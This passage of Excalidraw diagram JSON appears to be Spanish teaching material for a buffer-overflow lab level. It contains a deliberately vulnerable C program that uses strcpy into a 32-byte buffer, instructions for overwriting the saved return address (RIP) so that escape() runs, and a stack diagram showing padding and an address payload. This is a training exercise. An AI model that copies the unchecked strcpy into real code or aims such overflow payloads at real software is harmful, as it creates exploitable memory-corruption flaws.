			"originalText": "Nivel3: Manipulación de dirección de memoria:",
			"lineHeight": 1.25,
			"baseline": 26
		},
		{
			"type": "text",
			"version": 3430,
			"versionNonce": 1621445080,
			"isDeleted": false,
			"id": "5gcRpy0a",
			"fillStyle": "solid",
			"strokeWidth": 2,
			"strokeStyle": "solid",
			"roughness": 1,
			"opacity": 100,
			"angle": 0,
			"x": 711.8593970440756,
			"y": -1022.9876721675346,
			"strokeColor": "#1e1e1e",
			"backgroundColor": "transparent",
			"width": 977.1991577148438,
			"height": 375,
			"seed": 1128260911,
			"groupIds": [],
			"frameId": null,
			"roundness": null,
			"boundElements": [],
			"updated": 1727609540341,
			"link": null,
			"locked": false,
			"fontSize": 20,
			"fontFamily": 1,
			"text": "Objetivo a atacar: Ejecutable de programa vulnerable, se introducirá un argumento \nque servirá como payload.\n\nFuncionamiento del programa: El programa contiene 2 funciones, overflow() y escape(). Main \nejecutara overflow que insertará los datos introducidos por el usuario como argumento al buffer \nvulnerable usando la función vulnerable strcpy. La función escape imprime que el nivel ha sido\nsuperado, sin embargo no es ejecutada en ninguna parte del programa.\n\nComo superar el nivel: Usando herramientas como gdb, el usuario deberá determinar la \ndirección de memoria de la función escape(). Despues, aprovechando la vulnerabilidad de la \nfunción overflow() tendrá que desbordar la pila y cambiar la dirección de rentorno de esta\n(registro RIP).\n\nAl cambiar la dirección de retorno, el flujo del programa cambiara y escape se ejecutara.\n",
			"rawText": "Objetivo a atacar: Ejecutable de programa vulnerable, se introducirá un argumento \nque servirá como payload.\n\nFuncionamiento del programa: El programa contiene 2 funciones, overflow() y escape(). Main \nejecutara overflow que insertará los datos introducidos por el usuario como argumento al buffer \nvulnerable usando la función vulnerable strcpy. La función escape imprime que el nivel ha sido\nsuperado, sin embargo no es ejecutada en ninguna parte del programa.\n\nComo superar el nivel: Usando herramientas como gdb, el usuario deberá determinar la \ndirección de memoria de la función escape(). Despues, aprovechando la vulnerabilidad de la \nfunción overflow() tendrá que desbordar la pila y cambiar la dirección de rentorno de esta\n(registro RIP).\n\nAl cambiar la dirección de retorno, el flujo del programa cambiara y escape se ejecutara.\n",
			"textAlign": "left",
			"verticalAlign": "top",
			"containerId": null,
			"originalText": "Objetivo a atacar: Ejecutable de programa vulnerable, se introducirá un argumento \nque servirá como payload.\n\nFuncionamiento del programa: El programa contiene 2 funciones, overflow() y escape(). Main \nejecutara overflow que insertará los datos introducidos por el usuario como argumento al buffer \nvulnerable usando la función vulnerable strcpy. La función escape imprime que el nivel ha sido\nsuperado, sin embargo no es ejecutada en ninguna parte del programa.\n\nComo superar el nivel: Usando herramientas como gdb, el usuario deberá determinar la \ndirección de memoria de la función escape(). Despues, aprovechando la vulnerabilidad de la \nfunción overflow() tendrá que desbordar la pila y cambiar la dirección de rentorno de esta\n(registro RIP).\n\nAl cambiar la dirección de retorno, el flujo del programa cambiara y escape se ejecutara.\n",
			"lineHeight": 1.25,
			"baseline": 368
		},
		{
			"type": "text",
			"version": 580,
			"versionNonce": 1683514584,
			"isDeleted": false,
			"id": "qOkYHcAv",
			"fillStyle": "solid",
			"strokeWidth": 2,
			"strokeStyle": "solid",
			"roughness": 1,
			"opacity": 90,
			"angle": 0,
			"x": 163.47913597507775,
			"y": 852.4488648404301,
			"strokeColor": "#1e1e1e",
			"backgroundColor": "transparent",
			"width": 46.875,
			"height": 19.2,
			"seed": 1625727009,
			"groupIds": [],
			"frameId": null,
			"roundness": null,
			"boundElements": [],
			"updated": 1727608961278,
			"link": null,
			"locked": false,
			"fontSize": 16,
			"fontFamily": 3,
			"text": "buff1",
			"rawText": "buff1",
			"textAlign": "left",
			"verticalAlign": "top",
			"containerId": null,
			"originalText": "buff1",
			"lineHeight": 1.2,
			"baseline": 15
		},
		{
			"type": "text",
			"version": 536,
			"versionNonce": 2003760296,
			"isDeleted": false,
			"id": "gLvq99VA",
			"fillStyle": "solid",
			"strokeWidth": 2,
			"strokeStyle": "solid",
			"roughness": 1,
			"opacity": 90,
			"angle": 0,
			"x": 283.3550954598845,
			"y": 853.2421443734087,
			"strokeColor": "#1e1e1e",
			"backgroundColor": "transparent",
			"width": 46.875,
			"height": 19.2,
			"seed": 1630819087,
			"groupIds": [],
			"frameId": null,
			"roundness": null,
			"boundElements": [],
			"updated": 1727608961279,
			"link": null,
			"locked": false,
			"fontSize": 16,
			"fontFamily": 3,
			"text": "buff2",
			"rawText": "buff2",
			"textAlign": "left",
			"verticalAlign": "top",
			"containerId": null,
			"originalText": "buff2",
			"lineHeight": 1.2,
			"baseline": 15
		},
		{
			"type": "text",
			"version": 680,
			"versionNonce": 849742296,
			"isDeleted": false,
			"id": "wVBkMFd0",
			"fillStyle": "solid",
			"strokeWidth": 2,
			"strokeStyle": "solid",
			"roughness": 1,
			"opacity": 90,
			"angle": 0,
			"x": 171.87989385476266,
			"y": 1012.359148138601,
			"strokeColor": "#1e1e1e",
			"backgroundColor": "transparent",
			"width": 46.875,
			"height": 19.2,
			"seed": 751916815,
			"groupIds": [],
			"frameId": null,
			"roundness": null,
			"boundElements": [],
			"updated": 1727608961279,
			"link": null,
			"locked": false,
			"fontSize": 16,
			"fontFamily": 3,
			"text": "buff1",
			"rawText": "buff1",
			"textAlign": "left",
			"verticalAlign": "top",
			"containerId": null,
			"originalText": "buff1",
			"lineHeight": 1.2,
			"baseline": 15
		},
		{
			"type": "text",
			"version": 636,
			"versionNonce": 972693416,
			"isDeleted": false,
			"id": "EvEsxYL3",
			"fillStyle": "solid",
			"strokeWidth": 2,
			"strokeStyle": "solid",
			"roughness": 1,
			"opacity": 90,
			"angle": 0,
			"x": 291.7558533395694,
			"y": 1013.1524276715794,
			"strokeColor": "#1e1e1e",
			"backgroundColor": "transparent",
			"width": 46.875,
			"height": 19.2,
			"seed": 2043780399,
			"groupIds": [],
			"frameId": null,
			"roundness": null,
			"boundElements": [],
			"updated": 1727608961279,
			"link": null,
			"locked": false,
			"fontSize": 16,
			"fontFamily": 3,
			"text": "buff2",
			"rawText": "buff2",
			"textAlign": "left",
			"verticalAlign": "top",
			"containerId": null,
			"originalText": "buff2",
			"lineHeight": 1.2,
			"baseline": 15
		},
		{
			"type": "arrow",
			"version": 1120,
			"versionNonce": 1386405377,
			"isDeleted": false,
			"id": "XkYbObvnLj_fIZk8r7rNy",
			"fillStyle": "solid",
			"strokeWidth": 2,
			"strokeStyle": "solid",
			"roughness": 1,
			"opacity": 90,
			"angle": 0,
			"x": -218.05969835774755,
			"y": 924.5109053940856,
			"strokeColor": "#1e1e1e",
			"backgroundColor": "transparent",
			"width": 372.15057339014993,
			"height": 27.320490703548217,
			"seed": 1212767809,
			"groupIds": [],
			"frameId": null,
			"roundness": {
				"type": 2
			},
			"boundElements": [],
			"updated": 1711359523451,
			"link": null,
			"locked": false,
			"startBinding": null,
			"endBinding": {
				"elementId": "ZUIZIr92OBbBoCc8PHc3t",
				"focus": 0.44171923412358216,
				"gap": 11.01515230486359
			},
			"lastCommittedPoint": null,
			"startArrowhead": null,
			"endArrowhead": "arrow",
			"points": [
				[
					0,
					0
				],
				[
					372.15057339014993,
					-27.320490703548217
				]
			]
		},
		{
			"type": "text",
			"version": 386,
			"versionNonce": 301403864,
			"isDeleted": false,
			"id": "N0JZphUq",
			"fillStyle": "solid",
			"strokeWidth": 2,
			"strokeStyle": "solid",
			"roughness": 1,
			"opacity": 90,
			"angle": 0,
			"x": 19.161673711067692,
			"y": 47.92059454723912,
			"strokeColor": "#1e1e1e",
			"backgroundColor": "transparent",
			"width": 40.95994567871094,
			"height": 25,
			"seed": 887025089,
			"groupIds": [],
			"frameId": null,
			"roundness": null,
			"boundElements": [],
			"updated": 1727608961279,
			"link": null,
			"locked": false,
			"fontSize": 20,
			"fontFamily": 1,
			"text": "buff",
			"rawText": "buff",
			"textAlign": "left",
			"verticalAlign": "top",
			"containerId": null,
			"originalText": "buff",
			"lineHeight": 1.25,
			"baseline": 18
		},
		{
			"type": "text",
			"version": 434,
			"versionNonce": 2011687592,
			"isDeleted": false,
			"id": "3rWYRzJE",
			"fillStyle": "solid",
			"strokeWidth": 2,
			"strokeStyle": "solid",
			"roughness": 1,
			"opacity": 90,
			"angle": 0,
			"x": 132.54174594289987,
			"y": 45.15679856060112,
			"strokeColor": "#1e1e1e",
			"backgroundColor": "transparent",
			"width": 73.65992736816406,
			"height": 25,
			"seed": 689802657,
			"groupIds": [],
			"frameId": null,
			"roundness": null,
			"boundElements": [],
			"updated": 1727608961279,
			"link": null,
			"locked": false,
			"fontSize": 20,
			"fontFamily": 1,
			"text": "memoria",
			"rawText": "memoria",
			"textAlign": "left",
			"verticalAlign": "top",
			"containerId": null,
			"originalText": "memoria",
			"lineHeight": 1.25,
			"baseline": 18
		},
		{
			"type": "rectangle",
			"version": 1938,
			"versionNonce": 90838191,
			"isDeleted": false,
			"id": "pvB6SXLm_C5qM9v3Pl5jI",
			"fillStyle": "solid",
			"strokeWidth": 2,
			"strokeStyle": "solid",
			"roughness": 1,
			"opacity": 100,
			"angle": 0,
			"x": 168.50217222421264,
			"y": 959.9646224324213,
			"strokeColor": "#1e1e1e",
			"backgroundColor": "transparent",
			"width": 245.25979408738021,
			"height": 34.57769417444692,
			"seed": 715106575,
			"groupIds": [],
			"frameId": null,
			"roundness": {
				"type": 3
			},
			"boundElements": [],
			"updated": 1711359523451,
			"link": null,
			"locked": false
		},
		{
			"type": "line",
			"version": 936,
			"versionNonce": 1836192193,
			"isDeleted": false,
			"id": "MWWHUtuGod0lBj87SMQby",
			"fillStyle": "solid",
			"strokeWidth": 2,
			"strokeStyle": "solid",
			"roughness": 1,
			"opacity": 90,
			"angle": 0,
			"x": 282.74874599784334,
			"y": 960.1258620530164,
			"strokeColor": "#1e1e1e",
			"backgroundColor": "transparent",
			"width": 0.41357421767116875,
			"height": 34.740767166605394,
			"seed": 1057354063,
			"groupIds": [],
			"frameId": null,
			"roundness": {
				"type": 2
			},
			"boundElements": [],
			"updated": 1711359523451,
			"link": null,
			"locked": false,
			"startBinding": null,
			"endBinding": null,
			"lastCommittedPoint": null,
			"startArrowhead": null,
			"endArrowhead": null,
			"points": [
				[
					0,
					0
				],
				[
					0.41357421767116875,
					34.740767166605394
				]
			]
		},
		{
			"type": "text",
			"version": 856,
			"versionNonce": 1256158168,
			"isDeleted": false,
			"id": "j7uIwFMU",
			"fillStyle": "solid",
			"strokeWidth": 2,
			"strokeStyle": "solid",
			"roughness": 1,
			"opacity": 90,
			"angle": 0,
			"x": 166.87528086202445,
			"y": 930.7097105873106,
			"strokeColor": "#1e1e1e",
			"backgroundColor": "transparent",
			"width": 46.875,
			"height": 19.2,
			"seed": 116977519,
			"groupIds": [],
			"frameId": null,
			"roundness": null,
			"boundElements": [],
			"updated": 1727608961279,
			"link": null,
			"locked": false,
			"fontSize": 16,
			"fontFamily": 3,
			"text": "buff1",
			"rawText": "buff1",
			"textAlign": "left",
			"verticalAlign": "top",
			"containerId": null,
			"originalText": "buff1",
			"lineHeight": 1.2,
			"baseline": 15
		},
		{
			"type": "text",
			"version": 812,
			"versionNonce": 1810126248,
			"isDeleted": false,
			"id": "K0QwYSGB",
			"fillStyle": "solid",
			"strokeWidth": 2,
			"strokeStyle": "solid",
			"roughness": 1,
			"opacity": 90,
			"angle": 0,
			"x": 286.7512403468312,
			"y": 931.502990120289,
			"strokeColor": "#1e1e1e",
			"backgroundColor": "transparent",
			"width": 46.875,
			"height": 19.2,
			"seed": 1881614735,
			"groupIds": [],
			"frameId": null,
			"roundness": null,
			"boundElements": [],
			"updated": 1727608961279,
			"link": null,
			"locked": false,
			"fontSize": 16,
			"fontFamily": 3,
			"text": "buff2",
			"rawText": "buff2",
			"textAlign": "left",
			"verticalAlign": "top",
			"containerId": null,
			"originalText": "buff2",
			"lineHeight": 1.2,
			"baseline": 15
		},
		{
			"type": "text",
			"version": 846,
			"versionNonce": 1503786223,
			"isDeleted": false,
			"id": "EKcAQ9nZ",
			"fillStyle": "solid",
			"strokeWidth": 2,
			"strokeStyle": "solid",
			"roughness": 1,
			"opacity": 90,
			"angle": 0,
			"x": 292.4366548176821,
			"y": 968.0645376975899,
			"strokeColor": "#f08c00",
			"backgroundColor": "transparent",
			"width": 84.3046875,
			"height": 18.4,
			"seed": 667492271,
			"groupIds": [],
			"frameId": null,
			"roundness": null,
			"boundElements": [],
			"updated": 1711359523451,
			"link": null,
			"locked": false,
			"fontSize": 16,
			"fontFamily": 2,
			"text": "\"clave1234\"",
			"rawText": "\"clave1234\"",
			"textAlign": "left",
			"verticalAlign": "top",
			"containerId": null,
			"originalText": "\"clave1234\"",
			"lineHeight": 1.15,
			"baseline": 14
		},
		{
			"type": "arrow",
			"version": 346,
			"versionNonce": 22500737,
			"isDeleted": false,
			"id": "VW9fCDpoypsLVucP-bTpV",
			"fillStyle": "solid",
			"strokeWidth": 2,
			"strokeStyle": "solid",
			"roughness": 1,
			"opacity": 90,
			"angle": 0,
			"x": -106.21414077293042,
			"y": 979.907167174416,
			"strokeColor": "#1e1e1e",
			"backgroundColor": "transparent",
			"width": 257.2271500061583,
			"height": 2.217499395828213,
			"seed": 1849815841,
			"groupIds": [],
			"frameId": null,
			"roundness": {
				"type": 2
			},
			"boundElements": [],
			"updated": 1711359523451,
			"link": null,
			"locked": false,
			"startBinding": null,
			"endBinding": null,
			"lastCommittedPoint": null,
			"startArrowhead": null,
			"endArrowhead": "arrow",
			"points": [
				[
					0,
					0
				],
				[
					257.2271500061583,
					-2.217499395828213
				]
			]
		},
		{
			"type": "arrow",
			"version": 886,
			"versionNonce": 1653833487,
			"isDeleted": false,
			"id": "PkKIby6RCviNPszEo-hN3",
			"fillStyle": "solid",
			"strokeWidth": 2,
			"strokeStyle": "solid",
			"roughness": 1,
			"opacity": 90,
			"angle": 0,
			"x": -242.0128948973486,
			"y": 996.7533054715703,
			"strokeColor": "#1e1e1e",
			"backgroundColor": "transparent",
			"width": 397.4824086142682,
			"height": 51.55626732640951,
			"seed": 1637339919,
			"groupIds": [],
			"frameId": null,
			"roundness": {
				"type": 2
			},
			"boundElements": [],
			"updated": 1711359523451,
			"link": null,
			"locked": false,
			"startBinding": null,
			"endBinding": {
				"elementId": "jBLFVOq9nGFNUAAw0dtYh",
				"focus": -0.39063665230217975,
				"gap": 13.668385189181606
			},
			"lastCommittedPoint": null,
			"startArrowhead": null,
			"endArrowhead": "arrow",
			"points": [
				[
					0,
					0
				],
				[
					153.48277954027628,
					8.249322030688631
				],
				[
					397.4824086142682,
					51.55626732640951
				]
			]
		},
		{
			"type": "text",
			"version": 160,
			"versionNonce": 1913566168,
			"isDeleted": false,
			"id": "aoVsYRkR",
			"fillStyle": "solid",
			"strokeWidth": 2,
			"strokeStyle": "solid",
			"roughness": 1,
			"opacity": 90,
			"angle": 0,
			"x": 717.604854967665,
			"y": -638.3676417666641,
			"strokeColor": "#1e1e1e",
			"backgroundColor": "transparent",
			"width": 436.154296875,
			"height": 400.0594530052855,
			"seed": 70291009,
			"groupIds": [],
			"frameId": null,
			"roundness": null,
			"boundElements": [],
			"updated": 1727609541846,
			"link": null,
			"locked": false,
			"fontSize": 11.112762583480153,
			"fontFamily": 3,
			"text": "Codigo:\n\n#include <stdio.h>\n#include <string.h>\n\nvoid escape() {\n  printf(\"Nivel 3 superado!!!\")\n}\n\nvoid overflow(char *arg){\n  char buff[32]; \n  strcpy(buff, arg);\n  printf(\"Buffer content: %s\\n\", buff);\n\n  return 0;\n}\n\n\nint main(int argc, char *argv[]) {\n  printf(\"Puede que con escape() haya una forma de salir...\\n \\n\");\n  if(argc != 2){\n    printf(\"Uso: %s <payload>\\n\", argv[0]);\n    return 1;\n  }\n\n  overflow(argv[1]);\n  return 0;\n}\n\n",
			"rawText": "Codigo:\n\n#include <stdio.h>\n#include <string.h>\n\nvoid escape() {\n  printf(\"Nivel 3 superado!!!\")\n}\n\nvoid overflow(char *arg){\n  char buff[32]; \n  strcpy(buff, arg);\n  printf(\"Buffer content: %s\\n\", buff);\n\n  return 0;\n}\n\n\nint main(int argc, char *argv[]) {\n  printf(\"Puede que con escape() haya una forma de salir...\\n \\n\");\n  if(argc != 2){\n    printf(\"Uso: %s <payload>\\n\", argv[0]);\n    return 1;\n  }\n\n  overflow(argv[1]);\n  return 0;\n}\n\n",
			"textAlign": "left",
			"verticalAlign": "top",
			"containerId": null,
			"originalText": "Codigo:\n\n#include <stdio.h>\n#include <string.h>\n\nvoid escape() {\n  printf(\"Nivel 3 superado!!!\")\n}\n\nvoid overflow(char *arg){\n  char buff[32]; \n  strcpy(buff, arg);\n  printf(\"Buffer content: %s\\n\", buff);\n\n  return 0;\n}\n\n\nint main(int argc, char *argv[]) {\n  printf(\"Puede que con escape() haya una forma de salir...\\n \\n\");\n  if(argc != 2){\n    printf(\"Uso: %s <payload>\\n\", argv[0]);\n    return 1;\n  }\n\n  overflow(argv[1]);\n  return 0;\n}\n\n",
			"lineHeight": 1.2,
			"baseline": 397
		},
		{
			"type": "rectangle",
			"version": 287,
			"versionNonce": 84854063,
			"isDeleted": false,
			"id": "swTUI-6W91NPuaoCW0Rzp",
			"fillStyle": "solid",
			"strokeWidth": 2,
			"strokeStyle": "solid",
			"roughness": 1,
			"opacity": 90,
			"angle": 0,
			"x": 1189.5866305189807,
			"y": -634.2747506611588,
			"strokeColor": "#1e1e1e",
			"backgroundColor": "transparent",
			"width": 151.3087576819098,
			"height": 358.91868972810505,
			"seed": 1779674721,
			"groupIds": [],
			"frameId": null,
			"roundness": {
				"type": 3
			},
			"boundElements": [
				{
					"id": "hJYuwqkmRY2WHsY1-5n-X",
					"type": "arrow"
				}
			],
			"updated": 1711359523451,
			"link": null,
			"locked": false
		},
		{
			"type": "line",
			"version": 154,
			"versionNonce": 739158337,
			"isDeleted": false,
			"id": "2kCKnLz9-9W_MLXms-F80",
			"fillStyle": "solid",
			"strokeWidth": 2,
			"strokeStyle": "solid",
			"roughness": 1,
			"opacity": 90,
			"angle": 0,
			"x": 1190.7171576078697,
			"y": -585.823596982551,
			"strokeColor": "#1e1e1e",
			"backgroundColor": "transparent",
			"width": 150.6960021850566,
			"height": 0.801590218135857,
			"seed": 1163422575,
			"groupIds": [],
			"frameId": null,
			"roundness": {
				"type": 2
			},
			"boundElements": [],
			"updated": 1711359523452,
			"link": null,
			"locked": false,
			"startBinding": null,
			"endBinding": null,
			"lastCommittedPoint": null,
			"startArrowhead": null,
			"endArrowhead": null,
			"points": [
				[
					0,
					0
				],
				[
					150.6960021850566,
					-0.801590218135857
				]
			]
		},
		{
			"type": "line",
			"version": 199,
			"versionNonce": 1618757455,
			"isDeleted": false,
			"id": "GTmNZIBt4zAzzTq4Za-LN",
			"fillStyle": "solid",
			"strokeWidth": 2,
			"strokeStyle": "solid",
			"roughness": 1,
			"opacity": 90,
			"angle": 0,
			"x": 1192.5437609476373,
			"y": -538.6525679920514,
			"strokeColor": "#1e1e1e",
			"backgroundColor": "transparent",
			"width": 150.6960021850566,
			"height": 0.801590218135857,
			"seed": 493501807,
			"groupIds": [],
			"frameId": null,
			"roundness": {
				"type": 2
			},
			"boundElements": [],
			"updated": 1711359523452,
			"link": null,
			"locked": false,
			"startBinding": null,
			"endBinding": null,
			"lastCommittedPoint": null,
			"startArrowhead": null,
			"endArrowhead": null,
			"points": [
				[
					0,
					0
				],
				[
					150.6960021850566,
					-0.801590218135857
				]
			]
		},
		{
			"type": "line",
			"version": 506,
			"versionNonce": 701094177,
			"isDeleted": false,
			"id": "B3wOTvESSSk6f3Ueueyct",
			"fillStyle": "solid",
			"strokeWidth": 2,
			"strokeStyle": "solid",
			"roughness": 1,
			"opacity": 90,
			"angle": 0,
			"x": 1190.918165071722,
			"y": -363.15374445014606,
			"strokeColor": "#1e1e1e",
			"backgroundColor": "transparent",
			"width": 150.6960021850566,
			"height": 0.801590218135857,
			"seed": 956345007,
			"groupIds": [],
			"frameId": null,
			"roundness": {
				"type": 2
			},
			"boundElements": [],
			"updated": 1711359523452,
			"link": null,
			"locked": false,
			"startBinding": null,
			"endBinding": null,
			"lastCommittedPoint": null,
			"startArrowhead": null,
			"endArrowhead": null,
			"points": [
				[
					0,
					0
				],
				[
					150.6960021850566,
					-0.801590218135857
				]
			]
		},
		{
			"type": "text",
			"version": 82,
			"versionNonce": 454779048,
			"isDeleted": false,
			"id": "LrsGqEV6",
			"fillStyle": "solid",
			"strokeWidth": 2,
			"strokeStyle": "solid",
			"roughness": 1,
			"opacity": 90,
			"angle": 0,
			"x": 1236.3325151182446,
			"y": -621.1935043057007,
			"strokeColor": "#1e1e1e",
			"backgroundColor": "transparent",
			"width": 52.09257507324219,
			"height": 34.56630636476277,
			"seed": 178703297,
			"groupIds": [],
			"frameId": null,
			"roundness": null,
			"boundElements": [],
			"updated": 1727608961282,
			"link": null,
			"locked": false,
			"fontSize": 27.653045091810213,
			"fontFamily": 1,
			"text": "RIP",
			"rawText": "RIP",
			"textAlign": "left",
			"verticalAlign": "top",
			"containerId": null,
			"originalText": "RIP",
			"lineHeight": 1.25,
			"baseline": 24
		},
		{
			"type": "text",
			"version": 147,
			"versionNonce": 1061576152,
			"isDeleted": false,
			"id": "kmS8Boef",
			"fillStyle": "solid",
			"strokeWidth": 2,
			"strokeStyle": "solid",
			"roughness": 1,
			"opacity": 90,
			"angle": 0,
			"x": 1237.4987491964118,
			"y": -575.1557804007896,
			"strokeColor": "#1e1e1e",
			"backgroundColor": "transparent",
			"width": 57.1248779296875,
			"height": 34.56630636476277,
			"seed": 1390470383,
			"groupIds": [],
			"frameId": null,
			"roundness": null,
			"boundElements": [],
			"updated": 1727608961282,
			"link": null,
			"locked": false,
			"fontSize": 27.653045091810213,
			"fontFamily": 1,
			"text": "RBP",
			"rawText": "RBP",
			"textAlign": "left",
			"verticalAlign": "top",
			"containerId": null,
			"originalText": "RBP",
			"lineHeight": 1.25,
			"baseline": 24
		},
		{
			"type": "text",
			"version": 288,
			"versionNonce": 87624616,
			"isDeleted": false,
			"id": "7ZXOarRk",
			"fillStyle": "solid",
			"strokeWidth": 2,
			"strokeStyle": "solid",
			"roughness": 1,
			"opacity": 90,
			"angle": 0,
			"x": 1200.5655265594523,
			"y": -471.9509151312724,
			"strokeColor": "#1e1e1e",
			"backgroundColor": "transparent",
			"width": 128.60012817382812,
			"height": 34.56630636476277,
			"seed": 783333423,
			"groupIds": [],
			"frameId": null,
			"roundness": null,
			"boundElements": [],
			"updated": 1727608961283,
			"link": null,
			"locked": false,
			"fontSize": 27.653045091810213,
			"fontFamily": 1,
			"text": "Buff[32]",
			"rawText": "Buff[32]",
			"textAlign": "left",
			"verticalAlign": "top",
			"containerId": null,
			"originalText": "Buff[32]",
			"lineHeight": 1.25,
			"baseline": 24
		},
		{
			"type": "text",
			"version": 428,
			"versionNonce": 1332536024,
			"isDeleted": false,
			"id": "Ex6yB76p",
			"fillStyle": "solid",
			"strokeWidth": 2,
			"strokeStyle": "solid",
			"roughness": 1,
			"opacity": 90,
			"angle": 0,
			"x": 1251.0086688583237,
			"y": -339.87672740191874,
			"strokeColor": "#1e1e1e",
			"backgroundColor": "transparent",
			"width": 22.728286743164062,
			"height": 34.56630636476277,
			"seed": 1059129089,
			"groupIds": [],
			"frameId": null,
			"roundness": null,
			"boundElements": [],
			"updated": 1727608961283,
			"link": null,
			"locked": false,
			"fontSize": 27.653045091810213,
			"fontFamily": 1,
			"text": "...",
			"rawText": "...",
			"textAlign": "left",
			"verticalAlign": "top",
			"containerId": null,
			"originalText": "...",
			"lineHeight": 1.25,
			"baseline": 24
		},
		{
			"type": "rectangle",
			"version": 485,
			"versionNonce": 2123838895,
			"isDeleted": false,
			"id": "4pGvF0p3s8fnqbxt8p7sS",
			"fillStyle": "solid",
			"strokeWidth": 2,
			"strokeStyle": "solid",
			"roughness": 1,
			"opacity": 90,
			"angle": 0,
			"x": 1448.3111395473534,
			"y": -634.1490957083363,
			"strokeColor": "#1e1e1e",
			"backgroundColor": "transparent",
			"width": 151.3087576819098,
			"height": 358.91868972810505,
			"seed": 1352537473,
			"groupIds": [],
			"frameId": null,
			"roundness": {
				"type": 3
			},
			"boundElements": [
				{
					"id": "hJYuwqkmRY2WHsY1-5n-X",
					"type": "arrow"
				}
			],
			"updated": 1711359523452,
			"link": null,
			"locked": false
		},
		{
			"type": "line",
			"version": 350,
			"versionNonce": 1105428673,
			"isDeleted": false,
			"id": "-_xgbQSraQJNcnQl76ekd",
			"fillStyle": "solid",
			"strokeWidth": 2,
			"strokeStyle": "solid",
			"roughness": 1,
			"opacity": 90,
			"angle": 0,
			"x": 1449.4416666362426,
			"y": -585.6979420297284,
			"strokeColor": "#1e1e1e",
			"backgroundColor": "transparent",
			"width": 150.6960021850566,
			"height": 0.801590218135857,
			"seed": 438418785,
			"groupIds": [],
			"frameId": null,
			"roundness": {
				"type": 2
			},
			"boundElements": [],
			"updated": 1711359523452,
			"link": null,
			"locked": false,
			"startBinding": null,
			"endBinding": null,
			"lastCommittedPoint": null,
			"startArrowhead": null,
			"endArrowhead": null,
			"points": [
				[
					0,
					0
				],
				[
					150.6960021850566,
					-0.801590218135857
				]
			]
		},
		{
			"type": "line",
			"version": 395,
			"versionNonce": 1621272527,
			"isDeleted": false,
			"id": "9jN_kYOBWv-MFAOH2CS-M",
			"fillStyle": "solid",
			"strokeWidth": 2,
			"strokeStyle": "solid",
			"roughness": 1,
			"opacity": 90,
			"angle": 0,
			"x": 1451.2682699760103,
			"y": -538.5269130392289,
			"strokeColor": "#1e1e1e",
			"backgroundColor": "transparent",
			"width": 150.6960021850566,
			"height": 0.801590218135857,
			"seed": 1755670849,
			"groupIds": [],
			"frameId": null,
			"roundness": {
				"type": 2
			},
			"boundElements": [],
			"updated": 1711359523452,
			"link": null,
			"locked": false,
			"startBinding": null,
			"endBinding": null,
			"lastCommittedPoint": null,
			"startArrowhead": null,
			"endArrowhead": null,
			"points": [
				[
					0,
					0
				],
				[
					150.6960021850566,
					-0.801590218135857
				]
			]
		},
		{
			"type": "line",
			"version": 702,
			"versionNonce": 1847050401,
			"isDeleted": false,
			"id": "sRCc9hZ1O5538qsKUe4yZ",
			"fillStyle": "solid",
			"strokeWidth": 2,
			"strokeStyle": "solid",
			"roughness": 1,
			"opacity": 90,
			"angle": 0,
			"x": 1449.6426741000946,
			"y": -363.02808949732366,
			"strokeColor": "#1e1e1e",
			"backgroundColor": "transparent",
			"width": 150.6960021850566,
			"height": 0.801590218135857,
			"seed": 629709089,
			"groupIds": [],
			"frameId": null,
			"roundness": {
				"type": 2
			},
			"boundElements": [],
			"updated": 1711359523452,
			"link": null,
			"locked": false,
			"startBinding": null,
			"endBinding": null,
			"lastCommittedPoint": null,
			"startArrowhead": null,
			"endArrowhead": null,
			"points": [
				[
					0,
					0
				],
				[
					150.6960021850566,
					-0.801590218135857
				]
			]
		},
		{
			"type": "text",
			"version": 448,
			"versionNonce": 1416189608,
			"isDeleted": false,
			"id": "F3J8c8fZ",
			"fillStyle": "solid",
			"strokeWidth": 2,
			"strokeStyle": "solid",
			"roughness": 1,
			"opacity": 90,
			"angle": 0,
			"x": 1457.2145634522287,
			"y": -613.9777894821667,
			"strokeColor": "#e03131",
			"backgroundColor": "transparent",
			"width": 132.40451049804688,
			"height": 16.915512749776894,
			"seed": 1648020737,
			"groupIds": [],
			"frameId": null,
			"roundness": null,
			"boundElements": [],
			"updated": 1727608961284,
			"link": null,
			"locked": false,
			"fontSize": 13.532410199821516,
			"fontFamily": 1,
			"text": "\\x24\\x84\\x04\\x08",
			"rawText": "\\x24\\x84\\x04\\x08",
			"textAlign": "left",
			"verticalAlign": "top",
			"containerId": null,
			"originalText": "\\x24\\x84\\x04\\x08",
			"lineHeight": 1.25,
			"baseline": 12
		},
		{
			"type": "text",
			"version": 452,
			"versionNonce": 41600984,
			"isDeleted": false,
			"id": "jHwTLSwZ",
			"fillStyle": "solid",
			"strokeWidth": 2,
			"strokeStyle": "solid",
			"roughness": 1,
			"opacity": 90,
			"angle": 0,
			"x": 1494.4630439944751,
			"y": -578.5503393828596,
			"strokeColor": "#e03131",
			"backgroundColor": "transparent",
			"width": 54.4005126953125,
			"height": 25.49424825018432,
			"seed": 1446741217,
			"groupIds": [],
			"frameId": null,
			"roundness": null,
			"boundElements": [],
			"updated": 1727608961284,
			"link": null,
			"locked": false,
			"fontSize": 20.395398600147455,
			"fontFamily": 1,
			"text": "aaaa",
			"rawText": "aaaa",
			"textAlign": "left",
			"verticalAlign": "top",
			"containerId": null,
			"originalText": "aaaa",
			"lineHeight": 1.25,
			"baseline": 18
		},
		{
			"type": "text",
			"version": 974,
			"versionNonce": 223887784,
			"isDeleted": false,
			"id": "DfFn8V1W",
			"fillStyle": "solid",
			"strokeWidth": 2,
			"strokeStyle": "solid",
			"roughness": 1,
			"opacity": 90,
			"angle": 0,
			"x": 1494.4922362298141,
			"y": -535.1894787649017,
			"strokeColor": "#e03131",
			"backgroundColor": "transparent",
			"width": 57.30859375,
			"height": 161.14472136327788,
			"seed": 488259777,
			"groupIds": [],
			"frameId": null,
			"roundness": null,
			"boundElements": [],
			"updated": 1727608961285,
			"link": null,
			"locked": false,
			"fontSize": 21.485962848437048,
			"fontFamily": 1,
			"text": "aaaa\naaaa\naaaa\naaaa\naaaa\naaaa",
			"rawText": "aaaa\naaaa\naaaa\naaaa\naaaa\naaaa",
			"textAlign": "left",
			"verticalAlign": "top",
			"containerId": null,
			"originalText": "aaaa\naaaa\naaaa\naaaa\naaaa\naaaa",
			"lineHeight": 1.25,
			"baseline": 153
		},
		{
			"type": "text",
			"version": 624,
			"versionNonce": 1149504728,
			"isDeleted": false,
			"id": "KW8BGOD2",
			"fillStyle": "solid",
			"strokeWidth": 2,
			"strokeStyle": "solid",
			"roughness": 1,
			"opacity": 90,
